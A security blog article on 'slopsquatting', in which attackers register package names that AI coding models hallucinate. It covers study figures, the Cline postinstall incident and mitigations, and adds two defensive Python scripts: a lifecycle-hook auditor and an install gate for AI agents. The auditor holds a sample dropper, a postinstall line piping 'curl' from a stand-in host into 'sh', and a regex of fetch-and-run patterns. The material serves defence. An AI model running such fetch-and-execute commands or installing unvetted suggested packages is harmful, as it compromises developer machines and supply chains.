# Slopsquatting: Your AI Coding Agent Is Now a Supply Chain Risk

> Source: <https://byteiota.com/slopsquatting-ai-coding-agent-supply-chain-attack/>
> Published: 2026-07-04 14:09:22+00:00

On February 17, 2026, at 3:26 AM PT, roughly 4,000 developers updated their Cline AI coding tool and received something they never asked for: OpenClaw, silently installed on their machines via a postinstall script tucked inside a compromised npm package. The attackers had an eight-hour window. They used all of it. Welcome to slopsquatting — the supply chain attack your AI coding assistant is helping build.

## What Is Slopsquatting?

Slopsquatting is what happens when an AI model confidently recommends a package that does not exist, and an attacker has already registered that name with malicious code. It is the spiritual successor to typosquatting, except no one mistyped anything. The AI invented a plausible-sounding package name, and the developer — or their agent — ran `npm install`.

The term was coined by Seth Larson, developer in residence at the Python Software Foundation. The “slop” in slopsquatting is intentional — it refers to the low-quality, confident-sounding AI output that creates the vulnerability in the first place. Unlike typosquatting, there is no telltale misspelling to catch. The hallucinated name looks legitimate because the model generated it to sound legitimate.

## The Numbers Are Worse Than You Think

A [May 2026 study](https://arxiv.org/abs/2605.17062) tested five widely used coding models — Claude Sonnet 4.6, Claude Haiku 4.5, GPT-5.4-mini, Gemini 2.5 Pro, and DeepSeek V3.2 — across nearly 200,000 prompts. The finding that should concern every developer: **127 package names are hallucinated identically by all five models**. Not similar names. The exact same names. 109 on PyPI, 18 on npm.

That is not a quirk of one assistant. Those 127 names are pre-positioned attack infrastructure: an attacker registers them once and waits for any of the five models to recommend one to a developer.

Earlier [Cloud Security Alliance research](https://labs.cloudsecurityalliance.org/research/csa-research-note-slopsquatting-ai-supply-chain-20260419-csa/) found that 43% of hallucinated package names appeared on every single repeated run of the same prompt. An attacker needs only to run a few dozen prompts, note which fake package names keep recurring, and register them. The math is straightforward. The return on investment is high.

## The Attack Is Already Live

This is not a theoretical concern. The `unused-imports` package on npm is a textbook example: AI models consistently recommend it instead of the legitimate `eslint-plugin-unused-imports`. An attacker registered the hallucinated name with a malicious payload. As of early 2026, it was still recording approximately 233 weekly downloads despite npm marking it security-held.

As of July 1, 2026, [attackers are confirmed to be actively exploiting this vector](https://www.techtimes.com/articles/319457/20260701/ai-coding-agents-skip-package-verification-attackers-are-exploiting-it.htm). Real malicious packages built on slopsquatting have accumulated tens of thousands of downloads across the ecosystem. The window between “theoretical research” and “active exploitation” closed faster than most teams noticed.

## AI Agents Make It Exponentially Worse

When a developer follows a bad AI recommendation, they can pause before hitting Enter. When an AI agent does it, there is no pause. Tools like Claude Code, GitHub Copilot, and Cursor increasingly manage dependencies autonomously — pulling packages, adding them to manifests, running installs — without a human checkpoint between recommendation and execution.

npm runs a dependency's `preinstall`, `install` and `postinstall` scripts by default, and pip executes whatever `setup.py` a source distribution ships whenever it has to build one. Either way, a malicious payload executes the moment the install completes — before any code review, before any security scan, before anyone on the team knows a new package was added. The [Clinejection incident](https://snyk.io/blog/cline-supply-chain-attack-prompt-injection-github-actions/) illustrated this precisely: a compromised publish token, a postinstall script, and an eight-hour window were all it took to land unauthorized software on 4,000 developer machines. No one had to click anything. The agent handled it.
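Because the hooks above run silently, the first question a practitioner asks after an agent touches `package.json` is "which of these packages will execute code during install, and what?" The script below is an added example, not code from the article or from any of the tools it names: it walks a `node_modules` tree, reports every package that declares an install-time lifecycle script, and flags commands that look like droppers. The manifests it audits are constructed for the example; the `curl ... | sh` payload and the package names are invented, and the suspicious-pattern list is a heuristic of mine, not a registry rule.

```python
"""Audit which npm packages declare install-time lifecycle scripts.

Added illustration, not code from the article or from any tool it names.
Walks node_modules (or the constructed manifests below) and reports every
package that would execute code during `npm install`.
"""
import json
import os
import re
import tempfile

# Hooks npm runs for dependencies during install; `prepare` also runs for
# git dependencies, so it is included.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic (mine, not npm's): "fetch something and run it" style commands.
SUSPICIOUS = re.compile(
    r"curl|wget|\|\s*(sh|bash)\b|node\s+-e|base64|eval\(|powershell|Invoke-WebRequest",
    re.IGNORECASE,
)


def audit_manifest(name, manifest):
    """Return a finding dict if the manifest declares an install hook, else None."""
    scripts = manifest.get("scripts") or {}
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    if not hooks:
        return None
    flagged = [h for h, cmd in hooks.items() if SUSPICIOUS.search(cmd)]
    return {"package": name, "version": manifest.get("version", "?"),
            "hooks": hooks, "suspicious": flagged}


def audit_tree(root):
    """Walk node_modules under `root` and audit every package.json found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(os.path.join(root, "node_modules")):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except ValueError:
                continue  # unparsable manifest; npm would reject it too
        finding = audit_manifest(manifest.get("name", dirpath), manifest)
        if finding:
            findings.append(finding)
    return findings


# Constructed manifests: a legitimate native build step, a dropper of the kind
# the article describes (invented name and URL), and a package with no hooks.
SAMPLE_MANIFESTS = {
    "some-native-addon": {"version": "2.0.1", "scripts": {"install": "node-gyp rebuild"}},
    "totally-legit-helper": {"version": "0.0.3",
                             "scripts": {"postinstall": "curl -s https://example.invalid/x.sh | sh"}},
    "eslint-plugin-unused-imports": {"version": "4.1.4", "scripts": {"test": "jest"}},
}


def audit_samples():
    """Audit the constructed manifests in memory."""
    return [f for name, m in SAMPLE_MANIFESTS.items() if (f := audit_manifest(name, m))]


def demo_on_disk():
    """Write the constructed manifests into a temporary node_modules and audit it."""
    root = tempfile.mkdtemp()
    for name, m in SAMPLE_MANIFESTS.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump({"name": name, **m}, fh)
    return audit_tree(root)


if __name__ == "__main__":
    for finding in demo_on_disk():
        tag = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(f"[{tag}] {finding['package']}@{finding['version']}: {finding['hooks']}")
```

Run it against a real checkout by calling `audit_tree(".")` from the project root; a package whose install hook is `node-gyp rebuild` is usually a native addon doing what it says, while anything that fetches and pipes to a shell deserves a look before the install is allowed to complete.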

## What to Do Right Now

The mitigations are not complicated. None of them are on by default.

**For your pipelines:**

- Commit your lockfile (`package-lock.json`, `poetry.lock`) to source control and run `npm ci` instead of `npm install` in CI/CD. `npm ci` installs exactly what the lockfile records and aborts if `package.json` and the lockfile disagree, so there is no room for a surprise package to slip in
- Enable hash verification on all dependency installations: for pip, pin hashes in the requirements file and install with `--require-hashes`; npm verifies the `integrity` hashes recorded in the lockfile
- Run new packages through a behavioral analysis tool like [Socket.dev](https://socket.dev) or Snyk before installing

**For your AI agents:**

- Restrict agent permissions — do not grant unrestricted shell or exec access
- Implement an explicit package allowlist: any agent-recommended package not on the list requires human review before installation
- Use `npm install --ignore-scripts` to prevent lifecycle scripts from executing automatically, or set `ignore-scripts=true` in the project's `.npmrc` so an agent cannot forget the flag. Packages that genuinely need a build step (native addons) then have to be built deliberately, which is the point: the step becomes visible

```bash
# Install from lockfile only; fails if package.json and the lockfile disagree
npm ci

# Block preinstall/install/postinstall scripts from executing on install
npm install --ignore-scripts

# Scan before you install, using the Socket CLI wrapper around npm
npx socket npm install <package-name>
```
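The allowlist gate described above, and the "run the prompt repeatedly, keep the names that recur" procedure from the Cloud Security Alliance finding, are both simple enough to put in front of an agent's shell. The script below is an added example, not code from the article or from Cline, Cursor, Copilot or Claude Code. It assumes the agent's proposed command is handed to `gate()` before execution; the allowlist, the known-hallucinated set (seeded with the article's `unused-imports` example) and the registry snapshot are constructed in memory so it runs offline, where a real deployment would query `registry.npmjs.org` or `pypi.org`. The repeated-run data fed to `recurring_hallucinations()` is invented for the example.

```python
"""Pre-execution gate for package installs proposed by an AI coding agent.

Added illustration; not code from the article nor from any agent it names.
Assumes the agent's proposed shell command reaches gate() before it runs.
Registry lookups are replaced by a constructed in-memory snapshot.
"""
import re
import shlex
from collections import Counter
from dataclasses import dataclass

# Packages the team has reviewed and pre-approved (constructed sample).
ALLOWLIST = {"npm": {"eslint", "eslint-plugin-unused-imports", "lodash"},
             "pypi": {"requests", "pydantic"}}

# Names already seen as hallucinations; seeded with the article's example.
KNOWN_HALLUCINATED = {"npm": {"unused-imports"}, "pypi": set()}

# Stand-in for https://registry.npmjs.org/<name> and https://pypi.org/pypi/<name>/json
REGISTRY_SNAPSHOT = {"npm": {"eslint", "eslint-plugin-unused-imports", "lodash",
                             "unused-imports", "left-pad"},
                     "pypi": {"requests", "pydantic", "httpx"}}


@dataclass
class Decision:
    ecosystem: str
    package: str
    verdict: str  # "allow" | "review" | "block"
    reason: str


def _bare_name(eco, token):
    """'pkg@1.2', '@scope/pkg@^2', 'Pkg[extra]>=2', 'pkg==1.0' -> bare package name."""
    if eco == "npm":
        scoped = token.startswith("@")
        body = token[1:] if scoped else token
        name = body.split("@", 1)[0]
        return "@" + name if scoped else name
    return re.split(r"[\[=<>!~;\s]", token, maxsplit=1)[0].lower()


def parse_install(command):
    """Return (ecosystem, [names]) for an npm/pnpm/yarn/pip install command, else None."""
    argv = shlex.split(command)
    if len(argv) >= 4 and argv[0] in ("python", "python3") and argv[1:3] == ["-m", "pip"]:
        argv = argv[2:]  # normalise `python -m pip ...` to `pip ...`
    if len(argv) < 2:
        return None
    if argv[0] in ("npm", "pnpm", "yarn") and argv[1] in ("install", "i", "add"):
        eco = "npm"
    elif argv[0] in ("pip", "pip3") and argv[1] == "install":
        eco = "pypi"
    else:
        return None
    names, skip_next = [], False
    for tok in argv[2:]:
        if skip_next:
            skip_next = False  # value of -r/-c; requirement files are not gated here
        elif tok in ("-r", "--requirement", "-c", "--constraint"):
            skip_next = True
        elif not tok.startswith("-"):
            names.append(_bare_name(eco, tok))
    return eco, names


def gate(command):
    """One Decision per package; [] for commands that are not installs."""
    parsed = parse_install(command)
    if parsed is None:
        return []
    eco, names = parsed
    decisions = []
    for name in names:
        if name in ALLOWLIST[eco]:
            decisions.append(Decision(eco, name, "allow", "on team allowlist"))
        elif name in KNOWN_HALLUCINATED[eco]:
            decisions.append(Decision(eco, name, "block", "known AI-hallucinated name"))
        elif name not in REGISTRY_SNAPSHOT[eco]:
            decisions.append(Decision(eco, name, "block", "not on registry: hallucination candidate"))
        else:
            decisions.append(Decision(eco, name, "review", "exists but not allowlisted; human review"))
    return decisions


def should_execute(command):
    """True only if every package the command would install is allowlisted."""
    return all(d.verdict == "allow" for d in gate(command))


def recurring_hallucinations(eco, runs, min_fraction=0.5):
    """Names present in at least `min_fraction` of repeated runs of one prompt that
    do not exist on the registry: the stable hallucinations an attacker registers first.
    `runs` is a list of package-name lists, one per run."""
    counts = Counter(name for run in runs for name in set(run))
    return sorted(n for n, c in counts.items()
                  if c / len(runs) >= min_fraction and n not in REGISTRY_SNAPSHOT[eco])


if __name__ == "__main__":
    for d in gate("npm install unused-imports eslint left-pad"):
        print(d)
    # Constructed output of four runs of one prompt; one invented name recurs.
    runs = [["eslint", "react-unused-imports-fixer"], ["eslint", "react-unused-imports-fixer"],
            ["eslint", "one-off-name"], ["eslint", "react-unused-imports-fixer"]]
    print(recurring_hallucinations("npm", runs))
```

Names that `recurring_hallucinations()` returns belong in `KNOWN_HALLUCINATED` (and, for a registry you control, on a defensive-registration list) before an attacker gets to them; a "block" on a name that is not on the registry is worth logging for the same reason, since it tells you which names your team's tools are hallucinating today.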

## The Actual Problem

AI coding tools are not the villain here. Hallucination rates dropped from nearly 20% in 2025 to roughly 5–6% across major models in 2026 — real progress. The problem is the assumption baked into most development workflows: that AI agent actions require zero human oversight. That assumption was wrong before slopsquatting existed. It is dangerous now that attackers have found the gap.

Treat AI-recommended packages the same way you would treat a dependency submitted in a pull request from someone you have never met. Because that is effectively what it is. Your agent is only as trustworthy as the permissions you give it and the gates you put in its path — and right now, most teams have given their agents everything and gated nothing.
